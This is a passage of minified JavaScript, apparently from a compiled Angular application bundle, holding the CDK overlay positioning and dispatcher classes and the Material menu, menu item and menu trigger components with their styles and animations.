pe="",Re="",Fe="";T?Fe="flex-start":"center"===q?(Fe="center",te?Re=Y:pe=Y):te?"left"===q||"end"===q?(Fe="flex-end",pe=Y):("right"===q||"start"===q)&&(Fe="flex-start",Re=Y):"left"===q||"start"===q?(Fe="flex-start",pe=Y):("right"===q||"end"===q)&&(Fe="flex-end",Re=Y),a.position=this._cssPosition,a.marginLeft=T?"0":pe,a.marginTop=k?"0":this._topOffset,a.marginBottom=this._bottomOffset,a.marginRight=T?"0":Re,e.justifyContent=Fe,e.alignItems=k?"flex-start":this._alignItems}dispose(){if(this._isDisposed||!this._overlayRef)return;const a=this._overlayRef.overlayElement.style,e=this._overlayRef.hostElement,i=e.style;e.classList.remove(tF),i.justifyContent=i.alignItems=a.marginTop=a.marginBottom=a.marginLeft=a.marginRight=a.position="",this._overlayRef=null,this._isDisposed=!0}}let q_e=(()=>{class t{constructor(e,i,n,r){this._viewportRuler=e,this._document=i,this._platform=n,this._overlayContainer=r}global(){return new U_e}flexibleConnectedTo(e){return new H_e(e,this._viewportRuler,this._document,this._platform,this._overlayContainer)}}return t.\u0275fac=function(e){return new(e||t)(At(bm),At(ga),At(cr),At(ob))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),iF=(()=>{class t{constructor(e){this._attachedOverlays=[],this._document=e}ngOnDestroy(){this.detach()}add(e){this.remove(e),this._attachedOverlays.push(e)}remove(e){const i=this._attachedOverlays.indexOf(e);i>-1&&this._attachedOverlays.splice(i,1),0===this._attachedOverlays.length&&this.detach()}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),G_e=(()=>{class t extends iF{constructor(e,i){super(e),this._ngZone=i,this._keydownListener=n=>{const r=this._attachedOverlays;for(let c=r.length-1;c>-1;c--)if(r[c]._keydownEvents.observers.length>0){const d=r[c]._keydownEvents;this._ngZone?this._ngZone.run(()=>d.next(n)):d.next(n);break}}}add(e){super.add(e),this._isAttached||(this._ngZone?this._ngZone.runOutsideAngular(()=>this._document.body.addEventListener("keydown",this._keydownListener)):this._document.body.addEventListener("keydown",this._keydownListener),this._isAttached=!0)}detach(){this._isAttached&&(this._document.body.removeEventListener("keydown",this._keydownListener),this._isAttached=!1)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(qi,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),j_e=(()=>{class t extends iF{constructor(e,i,n){super(e),this._platform=i,this._ngZone=n,this._cursorStyleIsSet=!1,this._pointerDownListener=r=>{this._pointerDownEventTarget=Id(r)},this._clickListener=r=>{const c=Id(r),d="click"===r.type&&this._pointerDownEventTarget?this._pointerDownEventTarget:c;this._pointerDownEventTarget=null;const T=this._attachedOverlays.slice();for(let k=T.length-1;k>-1;k--){const q=T[k];if(q._outsidePointerEvents.observers.length<1||!q.hasAttached())continue;if(q.overlayElement.contains(c)||q.overlayElement.contains(d))break;const Y=q._outsidePointerEvents;this._ngZone?this._ngZone.run(()=>Y.next(r)):Y.next(r)}}}add(e){if(super.add(e),!this._isAttached){const i=this._document.body;this._ngZone?this._ngZone.runOutsideAngular(()=>this._addEventListeners(i)):this._addEventListeners(i),this._platform.IOS&&!this._cursorStyleIsSet&&(this._cursorOriginalValue=i.style.cursor,i.style.cursor="pointer",this._cursorStyleIsSet=!0),this._isAttached=!0}}detach(){if(this._isAttached){const e=this._document.body;e.removeEventListener("pointerdown",this._pointerDownListener,!0),e.removeEventListener("click",this._clickListener,!0),e.removeEventListener("auxclick",this._clickListener,!0),e.removeEventListener("contextmenu",this._clickListener,!0),this._platform.IOS&&this._cursorStyleIsSet&&(e.style.cursor=this._cursorOriginalValue,this._cursorStyleIsSet=!1),this._isAttached=!1}}_addEventListeners(e){e.addEventListener("pointerdown",this._pointerDownListener,!0),e.addEventListener("click",this._clickListener,!0),e.addEventListener("auxclick",this._clickListener,!0),e.addEventListener("contextmenu",this._clickListener,!0)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(cr),At(qi,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Q_e=0,As=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this.scrollStrategies=e,this._overlayContainer=i,this._componentFactoryResolver=n,this._positionBuilder=r,this._keyboardDispatcher=c,this._injector=d,this._ngZone=T,this._document=k,this._directionality=q,this._location=Y,this._outsideClickDispatcher=te,this._animationsModuleType=pe}create(e){const i=this._createHostElement(),n=this._createPaneElement(i),r=this._createPortalOutlet(n),c=new yg(e);return c.direction=c.direction||this._directionality.value,new nb(r,i,n,c,this._ngZone,this._keyboardDispatcher,this._document,this._location,this._outsideClickDispatcher,"NoopAnimations"===this._animationsModuleType)}position(){return this._positionBuilder}_createPaneElement(e){const i=this._document.createElement("div");return i.id="cdk-overlay-"+Q_e++,i.classList.add("cdk-overlay-pane"),e.appendChild(i),i}_createHostElement(){const e=this._document.createElement("div");return this._overlayContainer.getContainerElement().appendChild(e),e}_createPortalOutlet(e){return this._appRef||(this._appRef=this._injector.get(Yf)),new Zw(e,this._componentFactoryResolver,this._appRef,this._injector,this._document)}}return t.\u0275fac=function(e){return new(e||t)(At(F_e),At(ob),At(On),At(q_e),At(G_e),At(Ko),At(qi),At(ga),At(Cr),At(iy),At(j_e),At(ar,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const $_e=[{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom"},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"}],aF=new ni("cdk-connected-overlay-scroll-strategy");let t8=(()=>{class t{constructor(e){this.elementRef=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-overlay-origin",""],["","overlay-origin",""],["","cdkOverlayOrigin",""]],exportAs:["cdkOverlayOrigin"]}),t})(),i8=(()=>{class t{constructor(e,i,n,r,c){this._overlay=e,this._dir=c,this._hasBackdrop=!1,this._lockPosition=!1,this._growAfterOpen=!1,this._flexibleDimensions=!1,this._push=!1,this._backdropSubscription=I.EMPTY,this._attachSubscription=I.EMPTY,this._detachSubscription=I.EMPTY,this._positionSubscription=I.EMPTY,this.viewportMargin=0,this.open=!1,this.disableClose=!1,this.backdropClick=new Tt,this.positionChange=new Tt,this.attach=new Tt,this.detach=new Tt,this.overlayKeydown=new Tt,this.overlayOutsideClick=new Tt,this._templatePortal=new Mm(i,n),this._scrollStrategyFactory=r,this.scrollStrategy=this._scrollStrategyFactory()}get offsetX(){return this._offsetX}set offsetX(e){this._offsetX=e,this._position&&this._updatePositionStrategy(this._position)}get offsetY(){return this._offsetY}set offsetY(e){this._offsetY=e,this._position&&this._updatePositionStrategy(this._position)}get hasBackdrop(){return this._hasBackdrop}set hasBackdrop(e){this._hasBackdrop=wi(e)}get lockPosition(){return this._lockPosition}set lockPosition(e){this._lockPosition=wi(e)}get flexibleDimensions(){return this._flexibleDimensions}set flexibleDimensions(e){this._flexibleDimensions=wi(e)}get growAfterOpen(){return this._growAfterOpen}set growAfterOpen(e){this._growAfterOpen=wi(e)}get push(){return this._push}set push(e){this._push=wi(e)}get overlayRef(){return this._overlayRef}get dir(){return this._dir?this._dir.value:"ltr"}ngOnDestroy(){this._attachSubscription.unsubscribe(),this._detachSubscription.unsubscribe(),this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe(),this._overlayRef&&this._overlayRef.dispose()}ngOnChanges(e){this._position&&(this._updatePositionStrategy(this._position),this._overlayRef.updateSize({width:this.width,minWidth:this.minWidth,height:this.height,minHeight:this.minHeight}),e.origin&&this.open&&this._position.apply()),e.open&&(this.open?this._attachOverlay():this._detachOverlay())}_createOverlay(){(!this.positions||!this.positions.length)&&(this.positions=$_e);const e=this._overlayRef=this._overlay.create(this._buildConfig());this._attachSubscription=e.attachments().subscribe(()=>this.attach.emit()),this._detachSubscription=e.detachments().subscribe(()=>this.detach.emit()),e.keydownEvents().subscribe(i=>{this.overlayKeydown.next(i),27===i.keyCode&&!this.disableClose&&!es(i)&&(i.preventDefault(),this._detachOverlay())}),this._overlayRef.outsidePointerEvents().subscribe(i=>{this.overlayOutsideClick.next(i)})}_buildConfig(){const e=this._position=this.positionStrategy||this._createPositionStrategy(),i=new yg({direction:this._dir,positionStrategy:e,scrollStrategy:this.scrollStrategy,hasBackdrop:this.hasBackdrop});return(this.width||0===this.width)&&(i.width=this.width),(this.height||0===this.height)&&(i.height=this.height),(this.minWidth||0===this.minWidth)&&(i.minWidth=this.minWidth),(this.minHeight||0===this.minHeight)&&(i.minHeight=this.minHeight),this.backdropClass&&(i.backdropClass=this.backdropClass),this.panelClass&&(i.panelClass=this.panelClass),i}_updatePositionStrategy(e){const i=this.positions.map(n=>({originX:n.originX,originY:n.originY,overlayX:n.overlayX,overlayY:n.overlayY,offsetX:n.offsetX||this.offsetX,offsetY:n.offsetY||this.offsetY,panelClass:n.panelClass||void 0}));return e.setOrigin(this._getFlexibleConnectedPositionStrategyOrigin()).withPositions(i).withFlexibleDimensions(this.flexibleDimensions).withPush(this.push).withGrowAfterOpen(this.growAfterOpen).withViewportMargin(this.viewportMargin).withLockedPosition(this.lockPosition).withTransformOriginOn(this.transformOriginSelector)}_createPositionStrategy(){const e=this._overlay.position().flexibleConnectedTo(this._getFlexibleConnectedPositionStrategyOrigin());return this._updatePositionStrategy(e),e}_getFlexibleConnectedPositionStrategyOrigin(){return this.origin instanceof t8?this.origin.elementRef:this.origin}_attachOverlay(){this._overlayRef?this._overlayRef.getConfig().hasBackdrop=this.hasBackdrop:this._createOverlay(),this._overlayRef.hasAttached()||this._overlayRef.attach(this._templatePortal),this.hasBackdrop?this._backdropSubscription=this._overlayRef.backdropClick().subscribe(e=>{this.backdropClick.emit(e)}):this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe(),this.positionChange.observers.length>0&&(this._positionSubscription=this._position.positionChanges.pipe(eL(()=>this.positionChange.observers.length>0)).subscribe(e=>{this.positionChange.emit(e),0===this.positionChange.observers.length&&this._positionSubscription.unsubscribe()}))}_detachOverlay(){this._overlayRef&&this._overlayRef.detach(),this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(As),Ee(ho),Ee(fo),Ee(aF),Ee(Cr,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-connected-overlay",""],["","connected-overlay",""],["","cdkConnectedOverlay",""]],inputs:{origin:["cdkConnectedOverlayOrigin","origin"],positions:["cdkConnectedOverlayPositions","positions"],positionStrategy:["cdkConnectedOverlayPositionStrategy","positionStrategy"],offsetX:["cdkConnectedOverlayOffsetX","offsetX"],offsetY:["cdkConnectedOverlayOffsetY","offsetY"],width:["cdkConnectedOverlayWidth","width"],height:["cdkConnectedOverlayHeight","height"],minWidth:["cdkConnectedOverlayMinWidth","minWidth"],minHeight:["cdkConnectedOverlayMinHeight","minHeight"],backdropClass:["cdkConnectedOverlayBackdropClass","backdropClass"],panelClass:["cdkConnectedOverlayPanelClass","panelClass"],viewportMargin:["cdkConnectedOverlayViewportMargin","viewportMargin"],scrollStrategy:["cdkConnectedOverlayScrollStrategy","scrollStrategy"],open:["cdkConnectedOverlayOpen","open"],disableClose:["cdkConnectedOverlayDisableClose","disableClose"],transformOriginSelector:["cdkConnectedOverlayTransformOriginOn","transformOriginSelector"],hasBackdrop:["cdkConnectedOverlayHasBackdrop","hasBackdrop"],lockPosition:["cdkConnectedOverlayLockPosition","lockPosition"],flexibleDimensions:["cdkConnectedOverlayFlexibleDimensions","flexibleDimensions"],growAfterOpen:["cdkConnectedOverlayGrowAfterOpen","growAfterOpen"],push:["cdkConnectedOverlayPush","push"]},outputs:{backdropClick:"backdropClick",positionChange:"positionChange",attach:"attach",detach:"detach",overlayKeydown:"overlayKeydown",overlayOutsideClick:"overlayOutsideClick"},exportAs:["cdkConnectedOverlay"],features:[sa]}),t})();const X_e={provide:aF,deps:[As],useFactory:function K_e(t){return()=>t.scrollStrategies.reposition()}};let bu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[As,X_e],imports:[R1,yu,Hy,Hy]}),t})();const Y_e=["mat-menu-item",""];function J_e(t,a){1&t&&(fi(),m(0,"svg",2),it(1,"polygon",3),u())}const nF=["*"];function Z_e(t,a){if(1&t){const e=Ye();m(0,"div",0),he("keydown",function(n){return be(e),Me(B()._handleKeydown(n))})("click",function(){return be(e),Me(B().closed.emit("click"))})("@transformMenu.start",function(n){return be(e),Me(B()._onAnimationStart(n))})("@transformMenu.done",function(n){return be(e),Me(B()._onAnimationDone(n))}),m(1,"div",1),va(2),u()()}if(2&t){const e=B();V("id",e.panelId)("ngClass",e._classList)("@transformMenu",e._panelAnimationState),Rt("aria-label",e.ariaLabel||null)("aria-labelledby",e.ariaLabelledby||null)("aria-describedby",e.ariaDescribedby||null)}}const tA={transformMenu:nr("transformMenu",[sn("void",zi({opacity:0,transform:"scale(0.8)"})),gn("void => enter",En("120ms cubic-bezier(0, 0, 0.2, 1)",zi({opacity:1,transform:"scale(1)"}))),gn("* => void",En("100ms 25ms linear",zi({opacity:0})))]),fadeInItems:nr("fadeInItems",[sn("showing",zi({opacity:1})),gn("void => *",[zi({opacity:0}),En("400ms 100ms cubic-bezier(0.55, 0, 0.55, 0.2)")])])},oF=new ni("MatMenuContent");let ege=(()=>{class t{constructor(e,i,n,r,c,d,T){this._template=e,this._componentFactoryResolver=i,this._appRef=n,this._injector=r,this._viewContainerRef=c,this._document=d,this._changeDetectorRef=T,this._attached=new J}attach(e={}){var i;this._portal||(this._portal=new Mm(this._template,this._viewContainerRef)),this.detach(),this._outlet||(this._outlet=new Zw(this._document.createElement("div"),this._componentFactoryResolver,this._appRef,this._injector));const n=this._template.elementRef.nativeElement;n.parentNode.insertBefore(this._outlet.outletElement,n),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck(),this._portal.attach(this._outlet,e),this._attached.next()}detach(){this._portal.isAttached&&this._portal.detach()}ngOnDestroy(){this._outlet&&this._outlet.dispose()}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(On),Ee(Yf),Ee(Ko),Ee(fo),Ee(ga),Ee(Ma))},t.\u0275dir=Ot({type:t}),t})(),el=(()=>{class t extends ege{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["ng-template","matMenuContent",""]],features:[ki([{provide:oF,useExisting:t}]),ci]}),t})();const a8=new ni("MAT_MENU_PANEL"),tge=El(Zc(class{}));let qo=(()=>{class t extends tge{constructor(e,i,n,r,c){var d;super(),this._elementRef=e,this._document=i,this._focusMonitor=n,this._parentMenu=r,this._changeDetectorRef=c,this.role="menuitem",this._hovered=new J,this._focused=new J,this._highlighted=!1,this._triggersSubmenu=!1,null===(d=null==r?void 0:r.addItem)||void 0===d||d.call(r,this)}focus(e,i){this._focusMonitor&&e?this._focusMonitor.focusVia(this._getHostElement(),e,i):this._getHostElement().focus(i),this._focused.next(this)}ngAfterViewInit(){this._focusMonitor&&this._focusMonitor.monitor(this._elementRef,!1)}ngOnDestroy(){this._focusMonitor&&this._focusMonitor.stopMonitoring(this._elementRef),this._parentMenu&&this._parentMenu.removeItem&&this._parentMenu.removeItem(this),this._hovered.complete(),this._focused.complete()}_getTabIndex(){return this.disabled?"-1":"0"}_getHostElement(){return this._elementRef.nativeElement}_checkDisabled(e){this.disabled&&(e.preventDefault(),e.stopPropagation())}_handleMouseEnter(){this._hovered.next(this)}getLabel(){var e;const i=this._elementRef.nativeElement.cloneNode(!0),n=i.querySelectorAll("mat-icon, .material-icons");for(let r=0;r<n.length;r++)n[r].remove();return(null===(e=i.textContent)||void 0===e?void 0:e.trim())||""}_setHighlighted(e){var i;this._highlighted=e,null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()}_hasFocus(){return this._document&&this._document.activeElement===this._getHostElement()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(ga),Ee(js),Ee(a8,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["","mat-menu-item",""]],hostAttrs:[1,"mat-focus-indicator"],hostVars:10,hostBindings:function(e,i){1&e&&he("click",function(r){return i._checkDisabled(r)})("mouseenter",function(){return i._handleMouseEnter()}),2&e&&(Rt("role",i.role)("tabindex",i._getTabIndex())("aria-disabled",i.disabled.toString())("disabled",i.disabled||null),Ct("mat-menu-item",!0)("mat-menu-item-highlighted",i._highlighted)("mat-menu-item-submenu-trigger",i._triggersSubmenu))},inputs:{disabled:"disabled",disableRipple:"disableRipple",role:"role"},exportAs:["matMenuItem"],features:[ci],attrs:Y_e,ngContentSelectors:nF,decls:3,vars:3,consts:[["matRipple","",1,"mat-menu-ripple",3,"matRippleDisabled","matRippleTrigger"],["class","mat-menu-submenu-icon","viewBox","0 0 5 10","focusable","false",4,"ngIf"],["viewBox","0 0 5 10","focusable","false",1,"mat-menu-submenu-icon"],["points","0,0 5,5 0,10"]],template:function(e,i){1&e&&(Jn(),va(0),it(1,"div",0),ne(2,J_e,2,0,"svg",1)),2&e&&(C(1),V("matRippleDisabled",i.disableRipple||i.disabled)("matRippleTrigger",i._getHostElement()),C(1),V("ngIf",i._triggersSubmenu))},dependencies:[Ri,Dl],encapsulation:2,changeDetection:0}),t})();const rF=new ni("mat-menu-default-options",{providedIn:"root",factory:function ige(){return{overlapTrigger:!1,xPosition:"after",yPosition:"below",backdropClass:"cdk-overlay-transparent-backdrop"}}});let age=0,rb=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._ngZone=i,this._defaultOptions=n,this._changeDetectorRef=r,this._xPosition=this._defaultOptions.xPosition,this._yPosition=this._defaultOptions.yPosition,this._directDescendantItems=new Cd,this._tabSubscription=I.EMPTY,this._classList={},this._panelAnimationState="void",this._animationDone=new J,this.overlayPanelClass=this._defaultOptions.overlayPanelClass||"",this.backdropClass=this._defaultOptions.backdropClass,this._overlapTrigger=this._defaultOptions.overlapTrigger,this._hasBackdrop=this._defaultOptions.hasBackdrop,this.closed=new Tt,this.close=this.closed,this.panelId="mat-menu-panel-"+age++}get xPosition(){return this._xPosition}set xPosition(e){this._xPosition=e,this.setPositionClasses()}get yPosition(){return this._yPosition}set yPosition(e){this._yPosition=e,this.setPositionClasses()}get overlapTrigger(){return this._overlapTrigger}set overlapTrigger(e){this._overlapTrigger=wi(e)}get hasBackdrop(){return this._hasBackdrop}set hasBackdrop(e){this._hasBackdrop=wi(e)}set panelClass(e){const i=this._previousPanelClass;i&&i.length&&i.split(" ").forEach(n=>{this._classList[n]=!1}),this._previousPanelClass=e,e&&e.length&&(e.split(" ").forEach(n=>{this._classList[n]=!0}),this._elementRef.nativeElement.className="")}get classList(){return this.panelClass}set classList(e){this.panelClass=e}ngOnInit(){this.setPositionClasses()}ngAfterContentInit(){this._updateDirectDescendants(),this._keyManager=new L1(this._directDescendantItems).withWrap().withTypeAhead().withHomeAndEnd(),this._tabSubscription=this._keyManager.tabOut.subscribe(()=>this.closed.emit("tab")),this._directDescendantItems.changes.pipe(Ro(this._directDescendantItems),Ur(e=>ra(...e.map(i=>i._focused)))).subscribe(e=>this._keyManager.updateActiveItem(e)),this._directDescendantItems.changes.subscribe(e=>{var i;const n=this._keyManager;if("enter"===this._panelAnimationState&&(null===(i=n.activeItem)||void 0===i?void 0:i._hasFocus())){const r=e.toArray(),c=Math.max(0,Math.min(r.length-1,n.activeItemIndex||0));r[c]&&!r[c].disabled?n.setActiveItem(c):n.setNextItemActive()}})}ngOnDestroy(){this._directDescendantItems.destroy(),this._tabSubscription.unsubscribe(),this.closed.complete()}_hovered(){return this._directDescendantItems.changes.pipe(Ro(this._directDescendantItems),Ur(i=>ra(...i.map(n=>n._hovered))))}addItem(e){}removeItem(e){}_handleKeydown(e){const i=e.keyCode,n=this._keyManager;switch(i){case 27:es(e)||(e.preventDefault(),this.closed.emit("keydown"));break;case 37:this.parentMenu&&"ltr"===this.direction&&this.closed.emit("keydown");break;case 39:this.parentMenu&&"rtl"===this.direction&&this.closed.emit("keydown");break;default:return(38===i||40===i)&&n.setFocusOrigin("keyboard"),void n.onKeydown(e)}e.stopPropagation()}focusFirstItem(e="program"){this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{let i=null;if(this._directDescendantItems.length&&(i=this._directDescendantItems.first._getHostElement().closest('[role="menu"]')),!i||!i.contains(document.activeElement)){const n=this._keyManager;n.setFocusOrigin(e).setFirstItemActive(),!n.activeItem&&i&&i.focus()}})}resetActiveItem(){this._keyManager.setActiveItem(-1)}setElevation(e){const i=Math.min(this._baseElevation+e,24),n=`${this._elevationPrefix}${i}`,r=Object.keys(this._classList).find(c=>c.startsWith(this._elevationPrefix));(!r||r===this._previousElevation)&&(this._previousElevation&&(this._classList[this._previousElevation]=!1),this._classList[n]=!0,this._previousElevation=n)}setPositionClasses(e=this.xPosition,i=this.yPosition){var n;const r=this._classList;r["mat-menu-before"]="before"===e,r["mat-menu-after"]="after"===e,r["mat-menu-above"]="above"===i,r["mat-menu-below"]="below"===i,null===(n=this._changeDetectorRef)||void 0===n||n.markForCheck()}_startAnimation(){this._panelAnimationState="enter"}_resetAnimation(){this._panelAnimationState="void"}_onAnimationDone(e){this._animationDone.next(e),this._isAnimating=!1}_onAnimationStart(e){this._isAnimating=!0,"enter"===e.toState&&0===this._keyManager.activeItemIndex&&(e.element.scrollTop=0)}_updateDirectDescendants(){this._allItems.changes.pipe(Ro(this._allItems)).subscribe(e=>{this._directDescendantItems.reset(e.filter(i=>i._parentMenu===this)),this._directDescendantItems.notifyOnChanges()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(rF),Ee(Ma))},t.\u0275dir=Ot({type:t,contentQueries:function(e,i,n){if(1&e&&(fa(n,oF,5),fa(n,qo,5),fa(n,qo,4)),2&e){let r;Vt(r=Bt())&&(i.lazyContent=r.first),Vt(r=Bt())&&(i._allItems=r),Vt(r=Bt())&&(i.items=r)}},viewQuery:function(e,i){if(1&e&&Mi(ho,5),2&e){let n;Vt(n=Bt())&&(i.templateRef=n.first)}},inputs:{backdropClass:"backdropClass",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],xPosition:"xPosition",yPosition:"yPosition",overlapTrigger:"overlapTrigger",hasBackdrop:"hasBackdrop",panelClass:["class","panelClass"],classList:"classList"},outputs:{closed:"closed",close:"close"}}),t})(),Xo=(()=>{class t extends rb{constructor(e,i,n,r){super(e,i,n,r),this._elevationPrefix="mat-elevation-z",this._baseElevation=4}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(rF),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-menu"]],hostVars:3,hostBindings:function(e,i){2&e&&Rt("aria-label",null)("aria-labelledby",null)("aria-describedby",null)},exportAs:["matMenu"],features:[ki([{provide:a8,useExisting:t}]),ci],ngContentSelectors:nF,decls:1,vars:0,consts:[["tabindex","-1","role","menu",1,"mat-menu-panel",3,"id","ngClass","keydown","click"],[1,"mat-menu-content"]],template:function(e,i){1&e&&(Jn(),ne(0,Z_e,3,6,"ng-template"))},dependencies:[ig],styles:['mat-menu{display:none}.mat-menu-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;max-height:calc(100vh - 48px);border-radius:4px;outline:0;min-height:64px;position:relative}.mat-menu-panel.ng-animating{pointer-events:none}.cdk-high-contrast-active .mat-menu-panel{outline:solid 1px}.mat-menu-content:not(:empty){padding-top:8px;padding-bottom:8px}.mat-menu-item{-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;position:relative}.mat-menu-item::-moz-focus-inner{border:0}.mat-menu-item[disabled]{cursor:default}[dir=rtl] .mat-menu-item{text-align:right}.mat-menu-item .mat-icon{margin-right:16px;vertical-align:middle}.mat-menu-item .mat-icon svg{vertical-align:top}[dir=rtl] .mat-menu-item .mat-icon{margin-left:16px;margin-right:0}.mat-menu-item[disabled]::after{display:block;position:absolute;content:"";top:0;left:0;bottom:0;right:0}.cdk-high-contrast-active .mat-menu-item{margin-top:1px}.mat-menu-item-submenu-trigger{padding-right:32px}[dir=rtl] .mat-menu-item-submenu-trigger{padding-right:16px;padding-left:32px}.mat-menu-submenu-icon{position:absolute;top:50%;right:16px;transform:translateY(-50%);width:5px;height:10px;fill:currentColor}[dir=rtl] .mat-menu-submenu-icon{right:auto;left:16px;transform:translateY(-50%) scaleX(-1)}.cdk-high-contrast-active .mat-menu-submenu-icon{fill:CanvasText}button.mat-menu-item{width:100%}.mat-menu-item .mat-menu-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}'],encapsulation:2,data:{animation:[tA.transformMenu,tA.fadeInItems]},changeDetection:0}),t})();const n8=new ni("mat-menu-scroll-strategy"),oge={provide:n8,deps:[As],useFactory:function nge(t){return()=>t.scrollStrategies.reposition()}},sF=ym({passive:!0});let rge=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q){this._overlay=e,this._element=i,this._viewContainerRef=n,this._menuItemInstance=d,this._dir=T,this._focusMonitor=k,this._ngZone=q,this._overlayRef=null,this._menuOpen=!1,this._closingActionsSubscription=I.EMPTY,this._hoverSubscription=I.EMPTY,this._menuCloseSubscription=I.EMPTY,this._handleTouchStart=Y=>{F3(Y)||(this._openedBy="touch")},this._openedBy=void 0,this.restoreFocus=!0,this.menuOpened=new Tt,this.onMenuOpen=this.menuOpened,this.menuClosed=new Tt,this.onMenuClose=this.menuClosed,this._scrollStrategy=r,this._parentMaterialMenu=c instanceof rb?c:void 0,i.nativeElement.addEventListener("touchstart",this._handleTouchStart,sF),d&&(d._triggersSubmenu=this.triggersSubmenu())}get _deprecatedMatMenuTriggerFor(){return this.menu}set _deprecatedMatMenuTriggerFor(e){this.menu=e}get menu(){return this._menu}set menu(e){e!==this._menu&&(this._menu=e,this._menuCloseSubscription.unsubscribe(),e&&(this._menuCloseSubscription=e.close.subscribe(i=>{this._destroyMenu(i),("click"===i||"tab"===i)&&this._parentMaterialMenu&&this._parentMaterialMenu.closed.emit(i)})))}ngAfterContentInit(){this._handleHover()}ngOnDestroy(){this._overlayRef&&(this._overlayRef.dispose(),this._overlayRef=null),this._element.nativeElement.removeEventListener("touchstart",this._handleTouchStart,sF),this._menuCloseSubscription.unsubscribe(),this._closingActionsSubscription.unsubscribe(),this._hoverSubscription.unsubscribe()}get menuOpen(){return this._menuOpen}get dir(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}triggersSubmenu(){return!(!this._menuItemInstance||!this._parentMaterialMenu)}toggleMenu(){return this._menuOpen?this.closeMenu():this.openMenu()}openMenu(){const e=this.menu;if(this._menuOpen||!e)return;const i=this._createOverlay(e),n=i.getConfig(),r=n.positionStrategy;this._setPosition(e,r),n.hasBackdrop=null==e.hasBackdrop?!this.triggersSubmenu():e.hasBackdrop,i.attach(this._getPortal(e)),e.lazyContent&&e.lazyContent.attach(this.menuData),this._closingActionsSubscription=this._menuClosingActions().subscribe(()=>this.closeMenu()),this._initMenu(e),e instanceof rb&&(e._startAnimation(),e._directDescendantItems.changes.pipe(ea(e.close)).subscribe(()=>{r.withLockedPosition(!1).reapplyLastPosition(),r.withLockedPosition(!0)}))}closeMenu(){var e;null===(e=this.menu)||void 0===e||e.close.emit()}focus(e,i){this._focusMonitor&&e?this._focusMonitor.focusVia(this._element,e,i):this._element.nativeElement.focus(i)}updatePosition(){var e;null===(e=this._overlayRef)||void 0===e||e.updatePosition()}_destroyMenu(e){var i;if(!this._overlayRef||!this.menuOpen)return;const n=this.menu;this._closingActionsSubscription.unsubscribe(),this._overlayRef.detach(),this.restoreFocus&&("keydown"===e||!this._openedBy||!this.triggersSubmenu())&&this.focus(this._openedBy),this._openedBy=void 0,n instanceof rb?(n._resetAnimation(),n.lazyContent?n._animationDone.pipe(Dn(r=>"void"===r.toState),Cn(1),ea(n.lazyContent._attached)).subscribe({next:()=>n.lazyContent.detach(),complete:()=>this._setIsMenuOpen(!1)}):this._setIsMenuOpen(!1)):(this._setIsMenuOpen(!1),null===(i=null==n?void 0:n.lazyContent)||void 0===i||i.detach())}_initMenu(e){e.parentMenu=this.triggersSubmenu()?this._parentMaterialMenu:void 0,e.direction=this.dir,this._setMenuElevation(e),e.focusFirstItem(this._openedBy||"program"),this._setIsMenuOpen(!0)}_setMenuElevation(e){if(e.setElevation){let i=0,n=e.parentMenu;for(;n;)i++,n=n.parentMenu;e.setElevation(i)}}_setIsMenuOpen(e){this._menuOpen=e,this._menuOpen?this.menuOpened.emit():this.menuClosed.emit(),this.triggersSubmenu()&&this._menuItemInstance._setHighlighted(e)}_createOverlay(e){if(!this._overlayRef){const i=this._getOverlayConfig(e);this._subscribeToPositions(e,i.positionStrategy),this._overlayRef=this._overlay.create(i),this._overlayRef.keydownEvents().subscribe()}return this._overlayRef}_getOverlayConfig(e){return new yg({positionStrategy:this._overlay.position().flexibleConnectedTo(this._element).withLockedPosition().withGrowAfterOpen().withTransformOriginOn(".mat-menu-panel, 